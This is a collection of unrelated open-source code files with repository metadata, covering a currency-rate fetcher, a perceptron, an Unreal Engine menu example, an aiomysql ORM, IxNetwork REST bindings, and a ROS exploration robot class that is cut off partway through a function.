neoatlantis/currency-data
|
26566a5131b814f324153db451ae9f879fda9b72
|
c19bc94d6d6ba6706f625e94e176b77bee455b04
|
refs/heads/master
| 2020-06-10T19:02:58.973856
| 2016-12-08T06:35:46
| 2016-12-08T06:35:46
| 75,902,576
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,231
|
py
|
#!/usr/bin/env python
import os
import time
import requests
import shelve
import sys
BASEPATH = os.path.realpath(os.path.dirname(sys.argv[0]))
filepath = lambda *i: os.path.join(BASEPATH, *i)
# check for api key
try:
apikeyFilepath = filepath('apikey')
apikey = open(apikeyFilepath).read().strip()
except:
print "Put your API key at `openexchangerates.org` into file `apikey`."
sys.exit(1)
# check for database
db = shelve.open(filepath('currencies.db'), flag='c')
latest = 0
for key in db:
timestamp = float(key)
if timestamp > latest:
latest = timestamp
if time.time() - latest < 3000 and 'force' not in sys.argv:
print "You are requesting too frequent. Abandoned to prevent API",
print "exhaustion. Use `force` in command line to force a request."
db.close()
sys.exit(2)
# fetch url
url = "https://openexchangerates.org/api/latest.json?app_id=%s" % apikey
try:
req = requests.get(url)
if req.status_code != 200: raise
json = req.json()
json = {
'rates': json['rates'],
'timestamp': json['timestamp']
}
except:
print "Failed fetching newest data. Abort."
sys.exit(3)
print json
db[str(time.time())] = json
db.close()
sys.exit(0)
|
[
"contact@chaobai.li"
] |
contact@chaobai.li
|
796a852c4ccdd0bc598e0b373567c854094d0cfd
|
45fb509bf21ac003a40fd404d7c0cc995e741672
|
/perceptron_algorithm/perceptron_algo_2nd_method.py
|
59807adb1a2c854110b8644f2b103f49899851f4
|
[] |
no_license
|
FarahAgha/MachineLearning
|
0d17511f7495190dfd2368554428208c7d0eadf7
|
cf385135e016a63fb16bd326586fcd8ecb3c4355
|
refs/heads/master
| 2021-01-04T01:03:08.810401
| 2020-03-15T18:42:16
| 2020-03-15T18:42:16
| 240,314,331
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,011
|
py
|
# Perceptron Algorithm perceptron_algo_2nd_method.py
# See https://medium.com/@thomascountz/19-line-line-by-line-python-perceptron-b6f113b161f3 for details.
import numpy as np
class Perceptron(object):
def __init__(self, no_of_inputs, threshold=100, learning_rate=0.01):
self.threshold = threshold
self.learning_rate = learning_rate
self.weights = np.zeros(no_of_inputs + 1)
def predict(self, inputs):
summation = np.dot(inputs, self.weights[1:]) + self.weights[0]
if summation > 0:
activation = 1
else:
activation = 0
return activation
def train(self, training_inputs, labels):
for _ in range(self.threshold):
for inputs, label in zip(training_inputs, labels):
prediction = self.predict(inputs)
self.weights[1:] += self.learning_rate * (label - prediction) * inputs
self.weights[0] += self.learning_rate * (label - prediction)
|
[
"you@example.com"
] |
you@example.com
|
f85417abce36ad169336e4c143d0ed7ba2a666ea
|
1082d5cde908e101c51f69923212dcae4b4b60f4
|
/examples/sub_menu.py
|
9d7901f2f97b295d736199ba1b9a578957e289d8
|
[
"MIT"
] |
permissive
|
SaxonRah/UnrealEnginePython
|
88039c62024d01672138c4adeecac0fc9729bed0
|
d5f3b2e7a42209af31cbbd47377633e8d452439c
|
refs/heads/master
| 2021-01-04T23:56:44.556697
| 2020-02-16T00:38:43
| 2020-02-16T00:38:43
| 240,805,780
| 7
| 1
|
MIT
| 2020-02-16T00:03:20
| 2020-02-16T00:03:19
| null |
UTF-8
|
Python
| false
| false
| 1,313
|
py
|
import unreal_engine as ue
def open_submenu001(builder):
builder.begin_section('submenu001', 'i am a tooltip')
builder.add_menu_entry('sub_one', 'tooltip', lambda: ue.log('hello from submenu001'))
builder.add_menu_entry('sub_one_2', 'tooltip 2', lambda: ue.log('hello again'))
builder.end_section()
def open_sub_submenu(builder):
builder.begin_section('sub_submenu003', 'i am a tooltip for the submenu')
builder.add_menu_entry('sub_sub_three', 'tooltip', lambda: ue.log('hello from sub_submenu003'))
builder.end_section()
def open_submenu002(builder):
builder.begin_section('submenu002', 'i am a tooltip')
builder.add_menu_entry('sub_two', 'tooltip', lambda: ue.log('hello from submenu002'))
builder.add_sub_menu('sub sub menu', 'tooltip !', open_sub_submenu)
builder.end_section()
def open_menu(builder):
builder.begin_section('test1', 'test2')
builder.add_menu_entry('one', 'two', lambda: ue.log('ciao 1'))
builder.add_sub_menu('i am a submenu', 'tooltip for the submenu', open_submenu001)
builder.add_menu_entry('three', 'four', lambda: ue.log('ciao 2'))
builder.add_sub_menu('i am another submenu', 'tooltip for the second submenu', open_submenu002)
builder.end_section()
ue.add_menu_bar_extension('SimpleMenuBarExtension', open_menu)
|
[
"roberto.deioris@gmail.com"
] |
roberto.deioris@gmail.com
|
d77e5c51f77650cf17fab3e34a6d2b3c30310516
|
7672706c2d285a6eef5689381eef56dc3d6e779c
|
/assignment4_4.py
|
26bd85ba5395ef34dd76a3c0e7795f494e26d6ae
|
[] |
no_license
|
AreRex14/netprog-assignment
|
3fbf2f949d774f3a957297d5cb11f18b94e00815
|
1057bc2485a98c260320dc45c01c91a3e3a6ef18
|
refs/heads/master
| 2020-12-26T21:27:11.902369
| 2020-02-01T17:29:00
| 2020-02-01T17:29:00
| 237,649,985
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 656
|
py
|
import dns.resolver
import json
def MX_lookup(host):
answers = dns.resolver.query(host, 'MX')
servers = []
for rdata in answers:
servers.append((rdata.preference, rdata.exchange))
servers_pref_ascend = sorted(servers, key=lambda server: server[0])
return servers_pref_ascend
def JSON_lookup(host):
answers = dns.resolver.query(host, 'MX')
servers = []
for rdata in answers:
servers.append((rdata.preference, rdata.exchange))
data = json.dump(json.load(servers), indent=4)
return data
if __name__ == '__main__':
host = input("Enter a domain name to look up: ")
mail_servers = MX_lookup(host)
for s in mail_servers:
print(s)
|
[
"arerifxynwa@gmail.com"
] |
arerifxynwa@gmail.com
|
9a29224011fd3cca3b90735ed27fe0b1c8ed6bb9
|
699b767e854162231914f4bce177382a9880f221
|
/LinkedList/AddTwoNumbers.py
|
7f503cc9821d09b900119e244d002187998d27d2
|
[] |
no_license
|
XiwangLi/LeetcodeArchive
|
a66dc32f0a7248ff05cbe09dd0095191fefc602f
|
3de4a48f9f7de2970cf02751c1620281bae0947d
|
refs/heads/master
| 2021-04-28T02:57:55.604505
| 2019-02-28T01:07:51
| 2019-02-28T01:07:51
| 122,128,291
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 540
|
py
|
class Solution(object):
def addTwoNumbers(self, l1, l2):
"""
:type l1: ListNode
:type l2: ListNode
:rtype: ListNode
"""
head=ListNode(0)
curr=head
val=0
ten=0
while l1 or l2 or val:
if l1:
val+=l1.val
l1=l1.next
if l2:
val+=l2.val
l2=l2.next
curr.next=ListNode(val%10)
curr=curr.next
val=val//10
return head.next
|
[
"xiwangli2010@gmail.com"
] |
xiwangli2010@gmail.com
|
3b4b65765a6275e2b4fed60d9412aac3f7fb9665
|
d12b59b33df5c467abf081d48e043dac70cc5a9c
|
/ixnetwork_restpy/testplatform/sessions/ixnetwork/quicktest/passcriteria_985f11fda90dc3b8dac84a4a881b8740.py
|
6920d6cfe8478b76037b42d0c156e50d2daa5519
|
[
"MIT"
] |
permissive
|
ajbalogh/ixnetwork_restpy
|
59ce20b88c1f99f95a980ff01106bda8f4ad5a0f
|
60a107e84fd8c1a32e24500259738e11740069fd
|
refs/heads/master
| 2023-04-02T22:01:51.088515
| 2021-04-09T18:39:28
| 2021-04-09T18:39:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,492
|
py
|
# MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
class PassCriteria(Base):
"""This applies the Pass Criteria to each trial in the test and determines whether the trial passed or failed.
The PassCriteria class encapsulates a required passCriteria resource which will be retrieved from the server every time the property is accessed.
"""
__slots__ = ()
_SDM_NAME = 'passCriteria'
_SDM_ATT_MAP = {
'EnablePassFail': 'enablePassFail',
}
def __init__(self, parent):
super(PassCriteria, self).__init__(parent)
@property
def EnablePassFail(self):
"""
Returns
-------
- bool: If true, the pass fail criteria is set.
"""
return self._get_attribute(self._SDM_ATT_MAP['EnablePassFail'])
@EnablePassFail.setter
def EnablePassFail(self, value):
self._set_attribute(self._SDM_ATT_MAP['EnablePassFail'], value)
def update(self, EnablePassFail=None):
"""Updates passCriteria resource on the server.
Args
----
- EnablePassFail (bool): If true, the pass fail criteria is set.
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))
def Apply(self):
"""Executes the apply operation on the server.
Applies the specified Quick Test.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
return self._execute('apply', payload=payload, response_object=None)
def ApplyAsync(self):
"""Executes the applyAsync operation on the server.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
return self._execute('applyAsync', payload=payload, response_object=None)
def ApplyAsyncResult(self):
"""Executes the applyAsyncResult operation on the server.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
return self._execute('applyAsyncResult', payload=payload, response_object=None)
def ApplyITWizardConfiguration(self):
"""Executes the applyITWizardConfiguration operation on the server.
Applies the specified Quick Test.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
return self._execute('applyITWizardConfiguration', payload=payload, response_object=None)
def GenerateReport(self):
"""Executes the generateReport operation on the server.
Generate a PDF report for the last succesfull test run.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
return self._execute('generateReport', payload=payload, response_object=None)
def Run(self, *args, **kwargs):
"""Executes the run operation on the server.
Starts the specified Quick Test and waits for its execution to finish.
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
run(InputParameters=string)list
-------------------------------
- InputParameters (str): The input arguments of the test.
- Returns list(str): This method is synchronous and returns the result of the test.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('run', payload=payload, response_object=None)
def Start(self, *args, **kwargs):
"""Executes the start operation on the server.
Starts the specified Quick Test.
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
start(InputParameters=string)
-----------------------------
- InputParameters (str): The input arguments of the test.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('start', payload=payload, response_object=None)
def Stop(self):
"""Executes the stop operation on the server.
Stops the currently running Quick Test.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
return self._execute('stop', payload=payload, response_object=None)
def WaitForTest(self):
"""Executes the waitForTest operation on the server.
Waits for the execution of the specified Quick Test to be completed.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
return self._execute('waitForTest', payload=payload, response_object=None)
|
[
"andy.balogh@keysight.com"
] |
andy.balogh@keysight.com
|
1a406e49cacab5c4dcd0d7e60c97c70a3b1a7a36
|
bb05e1fafef1a62b85d5c97f10c9557cf7a240cc
|
/task_07_01.py
|
5bf2d6e493ddc44f970bb650a0474271f3285a79
|
[] |
no_license
|
Nafani4/Home_work
|
3bbc192dc6a43c40fd0358dfec863241e7b3ab96
|
69ce5d4321b3fc6b4bf4db7191912c3d4f4f8907
|
refs/heads/master
| 2021-05-16T03:31:23.457108
| 2017-11-26T21:11:30
| 2017-11-26T21:11:30
| 105,476,626
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 199
|
py
|
def fibonacci (num):
x, y = 0, 1
for i in range(num):
x, y = y, x + y
yield x
if __name__ == '__main__':
print(fibonacci(10))
for i in fibonacci(10):
print(i)
|
[
"grebennikov.mikhail@gmail.com"
] |
grebennikov.mikhail@gmail.com
|
b6061c81fb9c14cfe8a4b4a93e891fc90327de11
|
38444340385ab91a9148b10db3a981246b4496ff
|
/app/forms.py
|
cf23a56282b7fbe1de24973ded5f0f3faf55254e
|
[] |
no_license
|
dannzii/info3180-lab3
|
e27d7e82b18c27402f4e32ff2c8857f72b728b44
|
9a8c14c83ac8bad1c1895e05ebf03430caed6464
|
refs/heads/master
| 2020-04-22T06:15:11.017922
| 2019-02-14T20:28:16
| 2019-02-14T20:28:16
| 170,184,314
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 430
|
py
|
from flask_wtf import FlaskForm
from wtforms import StringField, TextAreaField
from wtforms.validators import DataRequired, Email
class ContactForm(FlaskForm):
name = StringField('Name', validators=[DataRequired()])
email = StringField('Email', validators=[DataRequired(), Email()])
subject = StringField('Subject', validators=[DataRequired()])
Text_Area = TextAreaField('Message', validators=[DataRequired()])
|
[
"34076867+dannzii@users.noreply.github.com"
] |
34076867+dannzii@users.noreply.github.com
|
5e3d18247eb1b3e3f1789add50668361ee4ebffd
|
f894c0969d30437b27ef4d0d81a99660bab10716
|
/learn_python/Day1/assignment1/quickpython.py
|
ee38744c52832b0503f6d108f472fea9ba41d649
|
[] |
no_license
|
AnandSankarR/Data_BootCamp_2018
|
364357e73a47e60990fd43dd37f427823f0b40ab
|
c5e4f818722864f8f56df5387a9f9cbe849ae3e4
|
refs/heads/master
| 2021-05-03T13:01:31.131736
| 2018-02-22T00:56:25
| 2018-02-22T00:56:25
| 120,506,879
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 25
|
py
|
print("This File Works")
|
[
"anandsankar.r@gmail.com"
] |
anandsankar.r@gmail.com
|
80830d2c4527373672b28a60f6897f9622dbb64d
|
4b2df7b62246133fd3c8af2529f6544dcf2b4350
|
/pushups/migrations/0005_auto_20181011_1118.py
|
b591fed36590ad62240012ec288faed71fe7cbe2
|
[] |
no_license
|
MrMacchew/LOL_CTS
|
24b0904f2a4b2934d0c386511c269684cfe3b3ca
|
cf9c7e434d73365aded766ac8703cb02ddd06104
|
refs/heads/master
| 2020-04-01T03:02:19.267620
| 2018-10-20T07:51:37
| 2018-10-20T07:51:37
| 152,806,859
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 390
|
py
|
# Generated by Django 2.1.1 on 2018-10-11 17:18
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('pushups', '0004_auto_20181011_1113'),
]
operations = [
migrations.AlterField(
model_name='match',
name='accountId',
field=models.IntegerField(default=None),
),
]
|
[
"mattcain@weber.edu"
] |
mattcain@weber.edu
|
30bf23cbb12bb828a340c74a0d91fa08a504b30e
|
777e23a382d7dd84232795a929c4004c768d1837
|
/www/orm.py
|
beb91d24c8bdbfe88c890b3f0be0725751427fef
|
[] |
no_license
|
Altkaka/Altkaka-Web
|
542126c2ec72453fb1ca8495892ef1bd4282f2e7
|
64773d579aa3097a1b3af2d071358105f388cf04
|
refs/heads/master
| 2021-05-04T19:14:23.648750
| 2017-10-12T08:40:16
| 2017-10-12T08:40:16
| 106,657,692
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,659
|
py
|
import logging; logging.basicConfig(level = logging.INFO)
import asyncio
import aiomysql
from myapis import APIError
from myapis import *
async def create_pool(loop, **kw):
logging.info('create database connection pool...')
global __pool
__pool = await aiomysql.create_pool(
host = kw.get('host','localhost'),
port = kw.get('port',3306),
user = kw['user'],
password = kw['password'],
db = kw['db'],
charset = kw.get('charset', 'utf8'),
autocommit = kw.get('autocommit', True),
maxsize = kw.get('maxsize', 10),
minsize = kw.get('minsize', 1),
loop = loop
)
async def select(sql, args, size=None):
logging.info('select : SQL: %s', sql)
logging.info('select : args: %s', args)
global __pool
async with __pool.get() as conn:
async with conn.cursor(aiomysql.DictCursor) as cur:
await cur.execute(sql.replace('?', '%s'), args or ())
if size:
rs = await cur.fetchmany(size)
else:
rs = await cur.fetchall()
logging.info('row returned: %s' % len(rs))
return rs
async def execute(sql, args, autocommit = True):
# logging.info('execute:SQL:',sql, 'args:',args)
# global __pool
# with (yield from __pool) as conn:
# try:
# cur = yield from conn.cursor()
# yield from cur.execute(sql.replace('?', '%s'), args)
# affected = cur.rowcount
# yield from cur.close()
# except BaseException as e:
# raise
# logging.ERROR(e.__context__)
# return affected
logging.info('execute : SQL: %s', sql)
logging.info('execute : args: %s', args)
global __pool
async with __pool.get() as conn:
if not autocommit:
await conn.begin()
try:
async with conn.cursor(aiomysql.DictCursor) as cur:
await cur.execute(sql.replace('?', '%s'), args)
affected = cur.rowcount
await cur.close()
if not autocommit:
await conn.commit()
logging.info('commit success!')
except BaseException as e:
if not autocommit:
await conn.rollback()
raise
finally:
conn.close()
return affected
logging.info('rows returned: %s ' % affected)
def create_args_string(len):
return '?'+',?'*(len-1)
class ModelMetaclass(type):
def __new__(cls, name, bases, attrs):
if name == 'Model':
return type.__new__(cls, name, bases, attrs)
tableName = attrs.get('__table__', None) or name
logging.info('found model: %s (table: %s)' % (name, tableName))
mappings = dict()
fields = []
primaryKey = None
for k, v in attrs.items():
if isinstance(v, Field):
logging.info('found mapping: %s ==> %s' % (k, v))
mappings[k] = v
if v.primary_key:
if primaryKey:
raise APIError('Duplicate primary key for field: %s' % k)
primaryKey = k
else:
fields.append(k)
if not primaryKey:
raise APIError('Primary key not found.')
for k in mappings.keys():
attrs.pop(k)
escaped_fields = list(map(lambda f: '`%s`' % f, fields))
attrs['__mappings__'] = mappings
attrs['__table__'] = tableName
attrs['__primary_key__'] = primaryKey
attrs['__fields__'] = fields
# 下列sql语句中的反引号是为了防止字段名称出现保留字报错而预留的,一般在进行mysql的sql语句撰写时,字段名称使用双引号防止报错
attrs['__select__'] = 'select `%s`, %s from `%s`' % (primaryKey, ','.join(escaped_fields), tableName)
attrs['__insert__'] = 'insert into `%s` (%s, `%s`) values (%s)' % (tableName, ','.join(escaped_fields), primaryKey, create_args_string(len(escaped_fields)+1))
attrs['__update__'] = 'update `%s` set %s where `%s`=?' % (tableName, ','.join(map(lambda f: '`%s`=?' % (mappings.get(f).name or f), fields)), primaryKey)
attrs['__delete__'] = 'delete from `%s` where `%s` = ?' % (tableName, primaryKey)
return type.__new__(cls, name, bases, attrs)
class Model(dict, metaclass=ModelMetaclass):
def __init__(self, **kw):
super(Model, self).__init__(**kw)
def __getattr__(self, key):
try:
return self[key]
except KeyError:
raise AttributeError(r"'Model' object has no attribute '%s' " % key)
def __setattr__(self, key, value):
self[key] = value
def getValue(self, key):
return getattr(self, key, None)
def getValueOrDefault(self, key):
value = getattr(self, key, None)
if value is None:
field = self.__mappings__[key]
if field.default is not None:
value = field.default() if callable(field.default) else field.default
logging.debug('using default value for %s:%s' % (key, str(value)))
setattr(self, key, value)
return value
@classmethod
#根据主键查找记录
async def find(cls, pk):
rs = await select('%s where `%s` = ?' % (cls.__select__, cls.__primary_key__), [pk], 1)
if len(rs) == 0:
return None
logging.info('find rs:%s',rs[0])
return cls(**rs[0])
async def save(self):
args = list(map(self.getValueOrDefault, self.__fields__))
args.append(self.getValueOrDefault(self.__primary_key__))
rows = await execute(self.__insert__, args)
if rows != 1:
logging.warning('faild to insert record: affected rows: %s' % rows)
@classmethod
#findAll() - 根据WHERE条件查找
async def findAll(cls, **kw):
order_flag = False
order_values = ''
limit_flag = False
limit_values = ()
logging.info('find-all beigin')
logging.info('find-all: %s-%d', kw, len(kw))
if has_orders(kw):
order_flag = True
order_values = kw[has_orders(kw)]
kw.pop(has_orders(kw))
if has_limit(kw):
limit_flag = True
limit_values = kw[has_limit(kw)]
kw.pop(has_limit(kw))
values = list(kw.values())
values.append(limit_values[0])
values.append(limit_values[1])
if len(kw)==0:
if order_flag and limit_flag:
rs = await select('%s order by %s limit ? , ?' % (cls.__select__, order_values), values)
elif order_flag and not limit_flag:
rs = await select('%s order by %s' % (cls.__select__, order_values), list(kw.values()))
elif not order_flag and limit_flag:
rs = await select('%s limit ? , ?' % cls.__select__,values)
else:
rs = await select('%s ' % cls.__select__ , args=None)
else:
if order_flag and limit_flag:
rs = await select('%s where %s order by %s limit ? , ?' % (cls.__select__, str_to_where(kw), order_values), values)
elif order_flag and not limit_flag:
rs = await select('%s where %s order by %s' % (cls.__select__, str_to_where(kw), order_values), list(kw.values()))
elif not order_flag and limit_flag:
rs = await select('%s where %s limit ? , ?' % (cls.__select__, str_to_where(kw)),values)
else:
rs = await select('%s where %s' % (cls.__select__, str_to_where(kw)), list(kw.values()))
if len(rs) == 0:
return None
logging.info('find-all end results: %s',rs)
return [cls(**r) for r in rs]
@classmethod
#findNumber() - 根据WHERE条件查找,但返回的是整数,适用于select count(*)类型的SQL
async def findNumber(cls, **kw):
if len(kw)==0:
logging.info('%s' % cls.__select__)
rs = await select('select count(*) from %s' % cls.__table__, args=None)
else:
rs = await select('select count(*) from %s where %s' % (cls.__table__, str_to_where(kw)), list(kw.values()))
logging.info('findnumber:%s', rs[0]['count(*)'])
if len(rs) == 0:
return None
return rs[0]['count(*)']
#根据主键插入
async def update(self):
args = list(map(self.getValueOrDefault, self.__fields__))
args.append(self.getValueOrDefault(self.__primary_key__))
rows = await execute(self.__update__, args)
return rows
#根据主键删除
async def remove(self):
args=[]
args.append(self.getValueOrDefault(self.__primary_key__))
rows = await execute(self.__delete__, args)
return rows
class Field(object):
def __init__(self, name, column_type, primary_key, default):
self.name = name
self.column_type = column_type
self.primary_key = primary_key
self.default = default
def __str__(self):
return '<%s, %s:%s>' % (self.__class__.__name__, self.column_type, self.name)
class StringField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='varchar(100)'):
super().__init__(name, ddl, primary_key, default)
class TinyIntField(Field):
def __init__(self, name=None, primary_key=False, default = None, ddl='tinyint'):
super().__init__(name, ddl, primary_key, default)
class SmallIntField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='smallint'):
super().__init__(name, ddl, primary_key, default)
class MediumIntField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='mediumint'):
super().__init__(name, ddl, primary_key, default)
class IntField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='int'):
super().__init__(name, ddl, primary_key, default)
class BigIntField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='bigint'):
super().__init__(name, ddl, primary_key, default)
class FloatField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='float'):
super().__init__(name, ddl, primary_key, default)
class DoubleField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='double'):
super().__init__(name, ddl, primary_key, default)
class DecimalField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='decimal(19,2)'):
super().__init__(name, ddl, primary_key, default)
class CharStringField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='char(100)'):
super().__init__(name, ddl, primary_key, default)
class TinyBlobField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='tinyblob'):
super().__init__(name, ddl, primary_key, default)
class TinyTextField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='tinytext'):
super().__init__(name, ddl, primary_key, default)
class BlobField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='blob'):
super().__init__(name, ddl, primary_key, default)
class TextField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='text'):
super().__init__(name, ddl, primary_key, default)
class MediumBlobField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='mediumblob'):
super().__init__(name, ddl, primary_key, default)
class MediumTextField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='mediumtext'):
super().__init__(name, ddl, primary_key, default)
class LongBlobField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='longblob'):
super().__init__(name, ddl, primary_key, default)
class longTextField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='longtext'):
super().__init__(name, ddl, primary_key, default)
class VarBinaryField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='varbinary(100)'):
super().__init__(name, ddl, primary_key, default)
class BinaryField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='binary(100)'):
super().__init__(name, ddl, primary_key, default)
class DateField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='date'):
super().__init__(name, ddl, primary_key, default)
class TimeField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='time'):
super().__init__(name, ddl, primary_key, default)
class YearField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='year'):
super().__init__(name, ddl, primary_key, default)
class DateTimeField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='datetime'):
super().__init__(name, ddl, primary_key, default)
class TimeStampField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='timestamp'):
super().__init__(name, ddl, primary_key, default)
class BooleanField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='boolean'):
super().__init__(name, ddl, primary_key, default)
|
[
"dongjiwukl@163.com"
] |
dongjiwukl@163.com
|
23c8d69f239e68820d41f4185adcd5f0106ad42c
|
799a1bbafe9ceb6fcf6530d176633a7f97980dad
|
/rosExploration/rrt_exploration/scripts/functions.py
|
ff7a90d07e7e15a5893aa3a916f02fcd97deeea5
|
[
"MIT"
] |
permissive
|
dingjianfeng/rosExplorationNew
|
e6598ed4b0907d7bc8740acf4ea05d8bae9a1524
|
53b8b6bcdd3372c5e6fbaecae9f66f266dcf70c0
|
refs/heads/master
| 2021-09-01T06:38:27.366634
| 2017-12-25T11:45:22
| 2017-12-25T11:45:22
| 115,333,542
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,206
|
py
|
#!/usr/bin/env python
#coding=utf-8
import rospy
import tf
from numpy import array
import actionlib
from move_base_msgs.msg import MoveBaseAction, MoveBaseGoal
from nav_msgs.srv import GetPlan
from geometry_msgs.msg import PoseStamped
from numpy import floor
from numpy.linalg import norm
from numpy import inf
#________________________________________________________________________________
class robot:
goal = MoveBaseGoal()
start = PoseStamped()
end = PoseStamped()
def __init__(self,name):
self.assigned_point=[]
self.name=name
self.global_frame=rospy.get_param('~global_frame','/map') #by ding
self.listener=tf.TransformListener()
self.listener.waitForTransform(self.global_frame, '/base_footprint', rospy.Time(0),rospy.Duration(10.0)) #by ding 不知道这个self.name要不要去掉
cond=0;
while cond==0:
try:
(trans,rot) = self.listener.lookupTransform(self.global_frame, '/base_footprint', rospy.Time(0)) #by ding
cond=1
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
cond==0
self.position=array([trans[0],trans[1]])
self.assigned_point=self.position
self.client=actionlib.SimpleActionClient('/move_base', MoveBaseAction) #by ding
self.client.wait_for_server()
robot.goal.target_pose.header.frame_id=self.global_frame
robot.goal.target_pose.header.stamp=rospy.Time.now()
rospy.wait_for_service('/move_base_node/GlobalPlanner/make_plan') #by ding 学习move_base 了解/NavfnROS/make_plan
self.make_plan = rospy.ServiceProxy('/move_base_node/GlobalPlanner/make_plan', GetPlan) #by ding
robot.start.header.frame_id=self.global_frame
robot.end.header.frame_id=self.global_frame
#获取位置坐标
def getPosition(self):
cond=0;
while cond==0:
try:
(trans,rot) = self.listener.lookupTransform(self.global_frame, '/base_footprint', rospy.Time(0)) #by ding
cond=1
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
cond==0
self.position=array([trans[0],trans[1]])
return self.position
#发送目标点
def sendGoal(self,point):
robot.goal.target_pose.pose.position.x=point[0]
robot.goal.target_pose.pose.position.y=point[1]
robot.goal.target_pose.pose.orientation.w = 1.0
self.client.send_goal(robot.goal)
self.assigned_point=array(point)
rospy.loginfo("the functions.py send goal"+robot.goal) #by ding
#取消目标点
def cancelGoal(self):
self.client.cancel_goal()
self.assigned_point=self.getPosition()
def getState(self):
return self.client.get_state()
def makePlan(self,start,end):
robot.start.pose.position.x=start[0]
robot.start.pose.position.y=start[1]
robot.end.pose.position.x=end[0]
robot.end.pose.position.y=end[1]
start=self.listener.transformPose('/map', robot.start) #by ding
end=self.listener.transformPose('/map', robot.end) #by ding
#plan=self.make_plan(start = start, goal = end, tolerance = 0.0)
plan=self.make_plan(start = start, goal = end, tolerance = 0.1) #tolerance的单位是meter by ding
rospy.loginfo("the functions.py makeplan") #by ding
return plan.plan.poses
#________________________________________________________________________________
def index_of_point(mapData,Xp): #个人理解,可能有偏差,坐标点的索引
resolution=mapData.info.resolution
